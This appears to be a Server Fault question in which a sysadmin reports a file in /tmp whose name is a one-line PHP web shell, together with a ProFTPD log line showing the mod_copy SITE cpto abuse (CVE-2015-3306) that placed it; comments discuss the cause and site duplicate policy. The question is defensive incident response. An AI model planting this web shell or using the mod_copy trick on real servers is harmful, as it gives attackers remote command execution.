1

I just found a file at the /tmp/ directory named .<?php passthru($_GET['cmd']);echo 'm3rg3';?>

Owner and GroupOwner are "proftpd" and "nogroup", respectively, as follows:

-rw-r--r-- 1 proftpd nogroup   89 Apr  9 01:15 .<?php passthru($_GET['cmd']);echo 'm3rg3';?>

FILE CONTENT

proftpd: 45.33.17.183:39686: SITE cpto /tmp/.<?php passthru($_GET['cmd']);echo 'm3rg3';?>

QUESTIONS

  1. How could one break into my server through ProFTPD?
  2. What can I do to fix this issue?
  3. What else should I look for after this finding?
  4. Is there a default password for the user "proftpd"?
  5. Can I find the "proftpd" password?
  6. At the "/tmp/" directory* I see this file .<?php passthru($_GET['cmd']);echo 'm3rg3';?> which is owned by "proftpd". Does is imply that someone successfully logged through FTP and uploaded that file there? Is there another way that it happened?
  7. How can I find the hole that allowed this happening?

MEASURES TAKEN SO FAR

  1. Changed ProFTPD port from 21 to something else;

  2. Commented mod_copy.c as suggested on this russian site: http://blog.foxylab.com/popytka-vzloma-moego-servera-cherez-uyazvimost-v-proftpd/

  3. Moved the injected file from /tmp/ to another directory, eg.: /tmp/injected_file/

  4. Didn't change ANY password (note: ftp is not used on this server).

  5. Searched for all files from user proftpd using find / -user proftpd. Nothing was found, besides the one file mentioned in the beginning.

Rafael Vidal
  • 111
  • 2
  • it's a specific question and with specific details, @MadHatter – Rafael Vidal May 06 '16 at 05:41
  • Indeed it is; but the linked duplicate is a [canonical question](http://meta.serverfault.com/questions/1986/what-are-the-canonical-answers-weve-discovered-over-the-years). These exist specifically to provide general answers to a family of questions; I recommend you follow the link for more information. – MadHatter May 06 '16 at 05:45
  • I have read that and many other similar questions, but none of them helped. Then, I asked this question, because someone may have this specific answer, @MadHatter – Rafael Vidal May 06 '16 at 06:17
  • 1
    My personal feeling is that your need doesn't supersede our logic in having canonical questions; as the explanation says, although everyone's particular problems in that class are somewhat different, to the extent that they are interesting, they aren't different, and to the extent that they're different, they aren't interesting **to anyone save the questioner**. However, I have acted unilaterally; you should escalate this to meta if you want a community ruling. Although I don't think your question is good, I have upvoted it, so you now have enough rep to post to meta and ask, if you want to. – MadHatter May 06 '16 at 06:23
  • Q1, Q6, Q7: [CVE-2015-3306](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306) - Q4, Q7 service accounts under linux typically have no valid password (or rather `!` or `*` in `/etc/shadow` which will never make a valid password hash match) – HBruijn May 06 '16 at 12:39
  • Ok, @MadHatter, I have to agree with you. Before our conversation I thought indeed to question Meta this "moderate mania", that makes users edit answer/question, suggest to move, mark as duplicate etc, just for reputation, a sort of competition. But I, admittedly, didn't reflect about the "canonical question" idea. I just thought that if every question is duplicate, then there is no question, and then no reason for a stackoverflow.com. A simplistically thinking, although pertinent. By the way, why do you think my question isn't good? Do you think I should be more specific? – Rafael Vidal May 07 '16 at 21:48
  • @RafaelVidal I should say I'm speaking only for myself, here, not quoting policy. Like most of the high-rep users here, I sysadmin professionally; the essence of SF for me is that I can help **more than one person** with what I write. I lose one answer's-worth of time, but **many** people save themselves that time; it is a net gain to humanity, which justifies my taking bread from my own mouth. You have an issue the details of which are so specific that the answer won't help anyone but you, and the generalities of which have already been answered. Hire a professional. – MadHatter May 08 '16 at 08:26
  • I should also warn you against taking up arms against the idea that we "*edit answer/question, suggest to move, mark as duplicate etc, just for reputation, a sort of competition*". High-rep users don't generate rep for any of the activities that you have listed; we do these "housekeeping" tasks for the love of the site, to try to keep it relevant and useful. – MadHatter May 08 '16 at 08:30

0 Answers0